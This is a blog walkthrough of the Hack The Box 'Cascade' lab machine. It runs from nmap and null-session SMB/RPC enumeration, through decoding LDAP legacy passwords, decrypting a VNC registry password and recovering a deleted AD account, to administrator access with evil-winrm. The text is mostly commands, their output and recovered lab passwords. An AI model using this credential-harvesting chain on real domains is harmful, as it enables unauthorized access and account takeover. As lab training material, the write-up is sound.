CASCADE WRITEUP

NMAP SCANS


    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 15:37 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating NSE at 15:37
    Completed NSE at 15:37, 0.00s elapsed
    Initiating Ping Scan at 15:37
    Scanning 10.10.10.182 [4 ports]
    Completed Ping Scan at 15:37, 0.66s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:37
    Completed Parallel DNS resolution of 1 host. at 15:37, 0.36s elapsed
    Initiating SYN Stealth Scan at 15:37
    Scanning 10.10.10.182 [1000 ports]
    Discovered open port 53/tcp on 10.10.10.182
    Discovered open port 139/tcp on 10.10.10.182
    Discovered open port 445/tcp on 10.10.10.182
    Discovered open port 135/tcp on 10.10.10.182
    Discovered open port 49157/tcp on 10.10.10.182
    Discovered open port 49158/tcp on 10.10.10.182
    Discovered open port 636/tcp on 10.10.10.182
    Discovered open port 49165/tcp on 10.10.10.182
    Discovered open port 3268/tcp on 10.10.10.182
    Discovered open port 3269/tcp on 10.10.10.182
    Discovered open port 389/tcp on 10.10.10.182
    Discovered open port 49155/tcp on 10.10.10.182
    Discovered open port 88/tcp on 10.10.10.182
    Discovered open port 49154/tcp on 10.10.10.182
    Completed SYN Stealth Scan at 15:38, 26.61s elapsed (1000 total ports)
    Initiating Service scan at 15:38
    Scanning 14 services on 10.10.10.182
    Completed Service scan at 15:39, 60.12s elapsed (14 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.182
    Retrying OS detection (try #2) against 10.10.10.182
    Initiating Traceroute at 15:39
    Completed Traceroute at 15:39, 0.43s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 15:39
    Completed Parallel DNS resolution of 2 hosts. at 15:39, 0.40s elapsed
    NSE: Script scanning 10.10.10.182.
    Initiating NSE at 15:39
    Completed NSE at 15:40, 40.10s elapsed
    Initiating NSE at 15:40
    Completed NSE at 15:42, 122.25s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Nmap scan report for 10.10.10.182
    Host is up (0.36s latency).
    Not shown: 986 filtered ports
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
    | dns-nsid: 
    |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-25 10:13:22Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds?
    636/tcp   open  tcpwrapped
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
    3269/tcp  open  tcpwrapped
    49154/tcp open  msrpc         Microsoft Windows RPC
    49155/tcp open  msrpc         Microsoft Windows RPC
    49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49158/tcp open  msrpc         Microsoft Windows RPC
    49165/tcp open  msrpc         Microsoft Windows RPC
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose|phone|specialized
    Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
    OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
    Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.254 days (since Thu Jun 25 09:36:50 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 5m01s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-06-25T10:14:28
    |_  start_date: 2020-06-25T04:12:26

    TRACEROUTE (using port 53/tcp)
    HOP RTT       ADDRESS
    1   411.99 ms 10.10.14.1
    2   411.97 ms 10.10.10.182

    NSE: Script Post-scanning.
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Initiating NSE at 15:42
    Completed NSE at 15:42, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 259.33 seconds
            Raw packets sent: 2085 (95.424KB) | Rcvd: 71 (5.040KB)

ENUMERATION PART

SMB ANONYMOUS ENUMERATION LOGIN :


    ┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #smbclient -L 10.10.10.182
    Enter WORKGROUP\root's password: 
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
    SMB1 disabled -- no workgroup available

RPCCLIENT ENUMEARTION NULL USER :


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #rpcclient -U "" 10.10.10.182
    Enter WORKGROUP\'s password: 
    rpcclient $> enum
    enumalsgroups      enumdomains        enumdrivers        enumkey            enumprinters       enumprocs          
    enumdata           enumdomgroups      enumforms          enummonitors       enumprivs          enumtrust          
    enumdataex         enumdomusers       enumjobs           enumports          enumprocdatatypes  
    rpcclient $> enumdomains 
    name:[CASCADE] idx:[0x0]
    name:[Builtin] idx:[0x0]
    rpcclient $> enumdomusers 
    user:[CascGuest] rid:[0x1f5]
    user:[arksvc] rid:[0x452]
    user:[s.smith] rid:[0x453]
    user:[r.thompson] rid:[0x455]
    user:[util] rid:[0x457]
    user:[j.wakefield] rid:[0x45c]
    user:[s.hickson] rid:[0x461]
    user:[j.goodhand] rid:[0x462]
    user:[a.turnbull] rid:[0x464]
    user:[e.crowe] rid:[0x467]
    user:[b.hanson] rid:[0x468]
    user:[d.burman] rid:[0x469]
    user:[BackupSvc] rid:[0x46a]
    user:[j.allen] rid:[0x46e]
    user:[i.croft] rid:[0x46f]
    rpcclient $> enumdomgroups 
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Group Policy Creator Owners] rid:[0x208]
    group:[DnsUpdateProxy] rid:[0x44f]
    rpcclient $> 

Here we got users and domains and groups

LDAP ENUMERAION :

nmap -p 389 –script ldap-* 10.10.10.182


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #ldapsearch -h 10.10.10.182 -x -s sub -b "DC=cascade,DC=local"
    # Ryan Thompson, Users, UK, cascade.local
    dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
    objectClass: top
    objectClass: person
    objectClass: organizationalPerson
    objectClass: user
    cn: Ryan Thompson
    sn: Thompson
    givenName: Ryan
    distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
    instanceType: 4
    whenCreated: 20200109193126.0Z
    whenChanged: 20200323112031.0Z
    displayName: Ryan Thompson
    uSNCreated: 24610
    memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
    uSNChanged: 295010
    name: Ryan Thompson
    objectGUID:: LfpD6qngUkupEy9bFXBBjA==
    userAccountControl: 66048
    badPwdCount: 0
    codePage: 0
    countryCode: 0
    badPasswordTime: 132247339091081169
    lastLogoff: 0
    lastLogon: 132247339125713230
    pwdLastSet: 132230718862636251
    primaryGroupID: 513
    objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
    accountExpires: 9223372036854775807
    logonCount: 2
    sAMAccountName: r.thompson
    sAMAccountType: 805306368
    userPrincipalName: r.thompson@cascade.local
    objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
    dSCorePropagationData: 20200126183918.0Z
    dSCorePropagationData: 20200119174753.0Z
    dSCorePropagationData: 20200119174719.0Z
    dSCorePropagationData: 20200119174508.0Z
    dSCorePropagationData: 16010101000000.0Z
    lastLogonTimestamp: 132294360317419816
    msDS-SupportedEncryptionTypes: 0
    cascadeLegacyPwd: clk0bjVldmE=

here we have some password which is base64 encoded : clk0bjVldmE= :rY4n5eva

ENUMERATION AFTER LOGINS

Till now we have users and password for user RYAN :

I will try this password for smbclient and evil-winrm :

RYAN : SMBCLIENT



    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #smbclient -U "r.thompson" -L 10.10.10.182
    Enter WORKGROUP\r.thompson's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
    SMB1 disabled -- no workgroup available
    ┌─[root@liquid]─[~/Desktop/HTB/cascadeC]
    └──╼ #

RYAN : EVIL-WINRM

┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascadeC]
└──╼ #evil-winrm -u r.thompson -p rY4n5eva -i 10.10.10.182

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

So it failed for winrm but we will use smb and will try to get more data from smb

So we will download all files from folder DATA


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #smbclient -U 'r.thompson' \\\\10.10.10.182\\Data 
    Enter WORKGROUP\r.thompson's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
    .                                   D        0  Mon Jan 27 08:57:34 2020
    ..                                  D        0  Mon Jan 27 08:57:34 2020
    Contractors                         D        0  Mon Jan 13 07:15:11 2020
    Finance                             D        0  Mon Jan 13 07:15:06 2020
    IT                                  D        0  Tue Jan 28 23:34:51 2020
    Production                          D        0  Mon Jan 13 07:15:18 2020
    Temps                               D        0  Mon Jan 13 07:15:15 2020
    cd Co
            13106687 blocks of size 4096. 7798117 blocks available
    smb: \> cd IT
    smb: \IT\> recurse ON
    smb: \IT\> mget *
    Get directory Email Archives? yes
    Get file Meeting_Notes_June_2018.html? yes
    getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
    Get directory LogonAudit? yes
    Get directory Logs? yes
    Get directory Ark AD Recycle Bin? yes
    Get file ArkAdRecycleBin.log? yes
    getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
    yeGet directory DCs?yes
    Get file dcdiag.log? yes
    getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (2.8 KiloBytes/sec) (average 1.4 KiloBytes/sec)
    yes
    Get directory Temp? yesGet directory r.thompson? 
    yes
    Get directory s.smith? yGet file VNC Install.reg? es
    getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (2.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
    yes

Here we have downloaded all the files from this folder and for remaining folders we didnot had permission to access

So we have a HTML file named meeting in email archive which looks suspicious :

Next we have a .reg VNC file which have password in hex form which was found in smith directory :


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

    [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
    "ExtraPorts"=""
    "QueryTimeout"=dword:0000001e
    "QueryAcceptOnTimeout"=dword:00000000
    "LocalInputPriorityTimeout"=dword:00000003
    "LocalInputPriority"=dword:00000000
    "BlockRemoteInput"=dword:00000000
    "BlockLocalInput"=dword:00000000
    "IpAccessControl"=""
    "RfbPort"=dword:0000170c
    "HttpPort"=dword:000016a8
    "DisconnectAction"=dword:00000000
    "AcceptRfbConnections"=dword:00000001
    "UseVncAuthentication"=dword:00000001
    "UseControlAuthentication"=dword:00000000
    "RepeatControlAuthentication"=dword:00000000
    "LoopbackOnly"=dword:00000000
    "AcceptHttpConnections"=dword:00000001
    "LogLevel"=dword:00000000
    "EnableFileTransfers"=dword:00000001
    "RemoveWallpaper"=dword:00000001
    "UseD3D"=dword:00000001
    "UseMirrorDriver"=dword:00000001
    "EnableUrlParams"=dword:00000001
    "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
    "AlwaysShared"=dword:00000000
    "NeverShared"=dword:00000000
    "DisconnectClients"=dword:00000001
    "PollingInterval"=dword:000003e8
    "AllowLoopback"=dword:00000000
    "VideoRecognitionInterval"=dword:00000bb8
    "GrabTransparentWindows"=dword:00000001
    "SaveLogToAllUsersPath"=dword:00000000
    "RunControlInterface"=dword:00000001
    "IdleTimeout"=dword:00000000
    "VideoClasses"=""
    "VideoRects"=""

“Password”=hex:6b,cf,2a,4b,6e,5a,ca,0f

To decrypt this : https://github.com/frizb/PasswordDecrypts

smith : 6bcf2a4b6e5aca0f : sT333ve2

GETTING USER ACCESS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\s.smith\Documents> ls
    *Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
    *Evil-WinRM* PS C:\Users\s.smith> cd Desktop
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> dir


        Directory: C:\Users\s.smith\Desktop


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -ar---        6/25/2020   5:16 AM             34 user.txt
    -a----        3/25/2020  11:17 AM           1031 WinDirStat.lnk


    *Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
    ed6c4b7931a5cb041cc4c5090a1efdca
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name       SID
    =============== ==============================================
    cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107


    GROUP INFORMATION
    -----------------

    Group Name                                  Type             SID                                            Attributes
    =========================================== ================ ============================================== ===============================================================
    Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Audit Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    *Evil-WinRM* PS C:\Users\s.smith\Desktop> 

Here we have got user flag

Here we can see that we have these privs and group is builtin :

So lets check remaining files from smb :

So I checked a File named ArkADRecyclebin and here is what we got :


    1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
    1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
    1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
    2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
    2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
    2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
    2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
    2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
    8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
    8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
    8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
    8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
    8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
    8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0

So their is user ArkSvc who is running AD :

Also from users we got from rpc we have user named arksvc so maybe we need to find password for this user

From AUDIT folder we have a sqlite3 file which has binary but if we run strings agaist this we can see text :


    ┌─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #strings Audit.db 
    SQLite format 3


    <---->



    j.allenJoseph Allen
    BackupSvcBackupSvc
    d.burmanDavid Burman
    b.hans
    ?dddddddd
    DEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49CN=dddd\0ADEL:f9bfa86b-d7ab-4561-b4b3-dbb1edb51f49,CN=Deleted Objects,DC=cascade,DC=local
    ITempAdminTempAdmin
    DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188aCN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
    ?tempTemp
    DEL:83cb74b3-2958-45d0-90f0-72d46a4abddcCN=Temp\0ADEL:83cb74b3-2958-45d0-90f0-72d46a4abddc,CN=Deleted Objects,DC=cascade,DC=local
    Mdeleteddeleted guy
    DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deefCN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
    ?testTest
    DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6dCN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
    ='ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local
    sqlb_temp_table_
    DeletedUserAudit
    Ldap
    dddddddd
    DEL:f9bfa86b-d7ab-45
    dddddddd

    <------>

Here we can see that we have text looks like hash So lets decode this :

Tp decode the above text : https://dotnetfiddle.net/G2eVVb

arksvc : BQO5l5Kj9MdErXx6Q6AGOw== : w3lc0meFr31nd


    ┌─[root@liquid]─[~/Desktop/HTB/cascade]
    └──╼ #evil-winrm -u arksvc -p w3lc0meFr31nd -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\arksvc\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\arksvc\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name      SID
    ============== ==============================================
    cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


    GROUP INFORMATION
    -----------------

    Group Name                                  Type             SID                                            Attributes
    =========================================== ================ ============================================== ===============================================================
    Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
    CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Here we see that we have privilege to use AD recyclebin

So we can get deleted part of AD from recycle bin

smith and arksvc are have kindoff same privs but AD part is given only for arksvc !

So to recover this I have taken help of the following links :

https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/

https://www.lepide.com/how-to/restore-deleted-objects-in-active-directory.html#:~:text=Navigate%20to%20start%20and%20type,to%20restore%20the%20deleted%20objects.

Recycle Part of Active Directory :


    *Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects



    Deleted           : True
    DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
    Name              : TempAdmin
                        DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    ObjectClass       : user
    ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059



    *Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

    <---->


    uSNChanged                      : 196700
    uSNCreated                      : 196690
    whenChanged                     : 1/26/2020 2:40:52 AM
    whenCreated                     : 1/26/2020 2:34:31 AM

    accountExpires                  : 9223372036854775807
    badPasswordTime                 : 0
    badPwdCount                     : 0
    CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
    CN                              : TempAdmin
                                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
    codePage                        : 0
    countryCode                     : 0
    Created                         : 1/27/2020 3:23:08 AM
    createTimeStamp                 : 1/27/2020 3:23:08 AM
    Deleted                         : True

    <---->

cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz : baCT3r1aN00dles [BASE64 DECODED]

GETTING ADMINISTRATOR ACCESS


    ┌─[root@liquid]─[~/Desktop/HTB/cascade/Logs/Ark AD Recycle Bin]
    └──╼ #evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
    cascade\administrator
    *Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
    CASC-DC1
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
    08e7a535*****************82e075

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: